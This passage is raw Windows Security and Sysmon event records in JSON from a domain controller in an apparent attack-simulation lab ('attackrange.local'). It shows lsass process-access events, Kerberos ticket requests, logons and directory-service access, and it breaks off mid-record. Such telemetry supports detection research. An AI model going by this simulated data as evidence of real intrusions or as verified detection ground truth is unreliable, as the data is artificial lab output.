05:47:09.890","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-0010FB590400}","TargetProcessId":"4192","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220331,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-881393$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{6C72D3DA-DD4C-4441-93C2-8AADEFB46786}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40800000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-881393$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40800000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{6C72D3DA-DD4C-4441-93C2-8AADEFB46786}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220332,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x467AC\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x467ac","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220333,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x467AC\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t49698\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x467ac","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"49698","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220334,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46818\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x46818","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220335,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x46818\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t49700\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x46818","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"49700","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4662,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14080,"OpcodeValue":0,"RecordNumber":220336,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An operation was performed on an object.\r\n\r\nSubject :\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46818\r\n\r\nObject:\r\n\tObject Server:\t\tDS\r\n\tObject Type:\t\t%{bf967a86-0de6-11d0-a285-00aa003049e2}\r\n\tObject Name:\t\t%{07b85c04-9d79-4c83-97b0-59d3cdaad73d}\r\n\tHandle ID:\t\t0x0\r\n\r\nOperation:\r\n\tOperation Type:\t\tObject Access\r\n\tAccesses:\t\tWrite Property\r\n\t\t\t\t\r\n\tAccess Mask:\t\t0x20\r\n\tProperties:\t\tWrite Property\r\n\t\t{e48d0154-bcf8-11d1-8702-00c04fb96050}\r\n\t\t\t{f3a64788-5306-11d1-a9c5-0000f80367c1}\r\n\t{bf967a86-0de6-11d0-a285-00aa003049e2}\r\n\r\n\r\nAdditional Information:\r\n\tParameter 1:\t\t-\r\n\tParameter 2:\t\t","Category":"Directory Service Access","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x46818","ObjectServer":"DS","ObjectType":"%{bf967a86-0de6-11d0-a285-00aa003049e2}","ObjectName":"%{07b85c04-9d79-4c83-97b0-59d3cdaad73d}","OperationType":"Object Access","HandleId":"0x0","AccessList":"%%7685\r\n\t\t\t\t","AccessMask":"0x20","Properties":"%%7685\r\n\t\t{e48d0154-bcf8-11d1-8702-00c04fb96050}\r\n\t\t\t{f3a64788-5306-11d1-a9c5-0000f80367c1}\r\n\t{bf967a86-0de6-11d0-a285-00aa003049e2}\r\n","AdditionalInfo":"-","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4662,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14080,"OpcodeValue":0,"RecordNumber":220337,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An operation was performed on an object.\r\n\r\nSubject :\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46818\r\n\r\nObject:\r\n\tObject Server:\t\tDS\r\n\tObject Type:\t\t%{bf967a86-0de6-11d0-a285-00aa003049e2}\r\n\tObject Name:\t\t%{07b85c04-9d79-4c83-97b0-59d3cdaad73d}\r\n\tHandle ID:\t\t0x0\r\n\r\nOperation:\r\n\tOperation Type:\t\tObject Access\r\n\tAccesses:\t\tWrite Property\r\n\t\t\t\t\r\n\tAccess Mask:\t\t0x20\r\n\tProperties:\t\tWrite Property\r\n\t\t{e48d0154-bcf8-11d1-8702-00c04fb96050}\r\n\t\t\t{f3a64788-5306-11d1-a9c5-0000f80367c1}\r\n\t{bf967a86-0de6-11d0-a285-00aa003049e2}\r\n\r\n\r\nAdditional Information:\r\n\tParameter 1:\t\t-\r\n\tParameter 2:\t\t","Category":"Directory Service Access","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x46818","ObjectServer":"DS","ObjectType":"%{bf967a86-0de6-11d0-a285-00aa003049e2}","ObjectName":"%{07b85c04-9d79-4c83-97b0-59d3cdaad73d}","OperationType":"Object Access","HandleId":"0x0","AccessList":"%%7685\r\n\t\t\t\t","AccessMask":"0x20","Properties":"%%7685\r\n\t\t{e48d0154-bcf8-11d1-8702-00c04fb96050}\r\n\t\t\t{f3a64788-5306-11d1-a9c5-0000f80367c1}\r\n\t{bf967a86-0de6-11d0-a285-00aa003049e2}\r\n","AdditionalInfo":"-","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220338,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x45B2D\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x45b2d","LogonType":"3","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2473,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.093\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.093","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220339,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220340,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220341,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when 